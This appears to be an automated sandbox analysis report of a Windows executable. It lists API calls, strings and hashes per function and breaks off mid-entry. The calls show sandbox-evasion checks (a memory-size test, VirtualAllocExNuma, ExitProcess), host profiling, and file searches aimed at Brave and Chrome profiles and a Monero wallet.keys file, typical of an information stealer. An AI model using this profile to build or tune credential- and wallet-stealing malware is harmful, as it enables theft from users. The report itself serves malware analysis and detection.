                                • Instruction ID: 59dfec1067963076c170827c5bec08f89c48f6de136ff51b5f27038e3c085a26
                                • Opcode Fuzzy Hash: 158de1e07cb6ea03cad2b46027c9f282fe92e97bf75e39f35b5b159bd390dad2
                                • Instruction Fuzzy Hash: 3311FE30954148ABEB14FFB4DD52FED7339AF90304F404558F81A5B592EF74AB05CA92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1493 931220-931247 call 9489b0 GlobalMemoryStatusEx 1496 931273-93127a 1493->1496 1497 931249-931271 call 94da00 * 2 1493->1497 1498 931281-931285 1496->1498 1497->1498 1500 931287 1498->1500 1501 93129a-93129d 1498->1501 1503 931292-931294 ExitProcess 1500->1503 1504 931289-931290 1500->1504 1504->1501 1504->1503
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0093123E
                                • ExitProcess.KERNEL32 ref: 00931294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 006c31c0806b407e58cc3c0c03d13fefa5c5e5ce6bc0ecac1ec971c440aa38a3
                                • Instruction ID: 463eba9c32cc48e7169ca00852a71cca200f6cb717b0b7fc970ebd5685d215a5
                                • Opcode Fuzzy Hash: 006c31c0806b407e58cc3c0c03d13fefa5c5e5ce6bc0ecac1ec971c440aa38a3
                                • Instruction Fuzzy Hash: AF011DB0D44308BBEB10EFE4CC49F9EBB78AB54705F208049E709B62D0DB7459458B99
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0093112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00931132
                                • ExitProcess.KERNEL32 ref: 00931143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 34e946083210e9df89ed3b1bb46a86bc95f3b582d032e72a7ea2846725ed6d78
                                • Instruction ID: bead969e56557794c731b591a9bb60568cd525602bc9698c328cb8202172a78c
                                • Opcode Fuzzy Hash: 34e946083210e9df89ed3b1bb46a86bc95f3b582d032e72a7ea2846725ed6d78
                                • Instruction Fuzzy Hash: 2CE0E670949308FBE7546BA09D0AB4D7678AB44B02F104154F70D771D0DAB52A419A9A
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009310B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009310F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: d98249c0730f421d4d8e8ee99cd73ef2316d4c38a2b70852142818488efcdf67
                                • Instruction ID: 5dca9fdf59d64c67696f6ee4f5887d58a550bb4bba7be8d3dc71b27ab5701e44
                                • Opcode Fuzzy Hash: d98249c0730f421d4d8e8ee99cd73ef2316d4c38a2b70852142818488efcdf67
                                • Instruction Fuzzy Hash: B4F0E2B1641208BBE7189AA4AC59FAFB7ECE705B15F300848F504E7290D9719F40CAA1
                                APIs
                                  • Part of subcall function 009478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00947910
                                  • Part of subcall function 009478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00947917
                                  • Part of subcall function 009478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0094792F
                                  • Part of subcall function 00947850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009311B7), ref: 00947880
                                  • Part of subcall function 00947850: RtlAllocateHeap.NTDLL(00000000), ref: 00947887
                                  • Part of subcall function 00947850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0094789F
                                • ExitProcess.KERNEL32 ref: 009311C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 4cd4e0298d0f21da547df46c6c50453ef4ccbe4db34a546a93f74665172614fe
                                • Instruction ID: 5b2c2f9dee3526044eebb7e959109a0423212101a18a083f4f896e0a902c79ef
                                • Opcode Fuzzy Hash: 4cd4e0298d0f21da547df46c6c50453ef4ccbe4db34a546a93f74665172614fe
                                • Instruction Fuzzy Hash: 1AE017B991830553CA4477F0AC8BF2F369C5B9474AF040828FA09D3212FE65E8408A6A
                                APIs
                                • wsprintfA.USER32 ref: 009438CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 009438E3
                                • lstrcat.KERNEL32(?,?), ref: 00943935
                                • StrCmpCA.SHLWAPI(?,00950F70), ref: 00943947
                                • StrCmpCA.SHLWAPI(?,00950F74), ref: 0094395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00943C67
                                • FindClose.KERNEL32(000000FF), ref: 00943C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 02bcd65a5f1e0c680528734457446c5d4956f9a4ac4b4583b68d951cd1b810b3
                                • Instruction ID: 8af562d82ad61dd9c9b84dbf0f8a5beef6f18036d4d1898a9a8019a70e488474
                                • Opcode Fuzzy Hash: 02bcd65a5f1e0c680528734457446c5d4956f9a4ac4b4583b68d951cd1b810b3
                                • Instruction Fuzzy Hash: F3A111B1A00218ABDB64EFA4DC85FEE7379BB84301F048588B95D97141EB759B84CF62
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00950B32,00950B2B,00000000,?,?,?,009513F4,00950B2A), ref: 0093BEF5
                                • StrCmpCA.SHLWAPI(?,009513F8), ref: 0093BF4D
                                • StrCmpCA.SHLWAPI(?,009513FC), ref: 0093BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093C7BF
                                • FindClose.KERNEL32(000000FF), ref: 0093C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 0f160bab538ecaa2c00a4f98f01ba06e22a732ec817186f1ea7eb5371c7c64de
                                • Instruction ID: ff7bda6e7b9fe4b4c13dcbe5a24ab4b5d624dd29f82e1fd4c0260ad778ba0333
                                • Opcode Fuzzy Hash: 0f160bab538ecaa2c00a4f98f01ba06e22a732ec817186f1ea7eb5371c7c64de
                                • Instruction Fuzzy Hash: E6425072950104ABEB14FB70DD96FEE737DABC4304F404558B90AA7191EE34AB49CFA2
                                APIs
                                • wsprintfA.USER32 ref: 0094492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00944943
                                • StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                • StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                • FindClose.KERNEL32(000000FF), ref: 00944B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: a4c387807c76d52df75dea81b66a5c29209904cfb8306872a48c394fafe4f888
                                • Instruction ID: b75513e1704713cf8d4b8524e603094fd6c09e860b089f476d4f7866636f0df6
                                • Opcode Fuzzy Hash: a4c387807c76d52df75dea81b66a5c29209904cfb8306872a48c394fafe4f888
                                • Instruction Fuzzy Hash: 546101B2900218ABCB64EBA0DC45FEE737CBBC8705F044598B50D96151EE75EB89CF92
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00944580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00944587
                                • wsprintfA.USER32 ref: 009445A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 009445BD
                                • StrCmpCA.SHLWAPI(?,00950FC4), ref: 009445EB
                                • StrCmpCA.SHLWAPI(?,00950FC8), ref: 00944601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0094468B
                                • FindClose.KERNEL32(000000FF), ref: 009446A0
                                • lstrcat.KERNEL32(?,015BFAD0), ref: 009446C5
                                • lstrcat.KERNEL32(?,015BEAB0), ref: 009446D8
                                • lstrlen.KERNEL32(?), ref: 009446E5
                                • lstrlen.KERNEL32(?), ref: 009446F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 73ae00ac9c3e10ca3dca3dd7253a1f105c5d07f83c508792ee3acb2983c9c3c2
                                • Instruction ID: a3ea04865d1a8775717acebcbb0d755b82b693f5a6bae8c627101b890dd8dbfb
                                • Opcode Fuzzy Hash: 73ae00ac9c3e10ca3dca3dd7253a1f105c5d07f83c508792ee3acb2983c9c3c2
                                • Instruction Fuzzy Hash: 855134B2550218ABC764EB70DC89FED737CAB98701F404588F60D97190EF749B858F92
                                APIs
                                • wsprintfA.USER32 ref: 00943EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00943EDA
                                • StrCmpCA.SHLWAPI(?,00950FAC), ref: 00943F08
                                • StrCmpCA.SHLWAPI(?,00950FB0), ref: 00943F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0094406C
                                • FindClose.KERNEL32(000000FF), ref: 00944081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 4b700a1b8b46c7096537457b079891bac20fb44399735ba83e6f57120f5acb8f
                                • Instruction ID: 716d7f364e542b293e518b088a042c520d22bde7c2704b40cc3adc2a37f0f6a0
                                • Opcode Fuzzy Hash: 4b700a1b8b46c7096537457b079891bac20fb44399735ba83e6f57120f5acb8f
                                • Instruction Fuzzy Hash: A95113B2900218ABCB24EBB0DC85FEE737CBBD4304F404588B65D96151EF75AB898F91
                                APIs
                                • wsprintfA.USER32 ref: 0093ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 0093ED55
                                • StrCmpCA.SHLWAPI(?,00951538), ref: 0093EDAB
                                • StrCmpCA.SHLWAPI(?,0095153C), ref: 0093EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093F2AE
                                • FindClose.KERNEL32(000000FF), ref: 0093F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: e7282283d754456a9303167ddb3785f4bd1b46c48f85ee05c79ea0c817ad8ac1
                                • Instruction ID: c1bc3b5fd5c4d88c95ce331c0a0ddd6713bcac0c0c49da5cba9c7e3adda84f7a
                                • Opcode Fuzzy Hash: e7282283d754456a9303167ddb3785f4bd1b46c48f85ee05c79ea0c817ad8ac1
                                • Instruction Fuzzy Hash: 59E1CF72951118AAEB54FB60DC52FEE7338EFD4304F404599B50A62192EF306F8ACF56
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
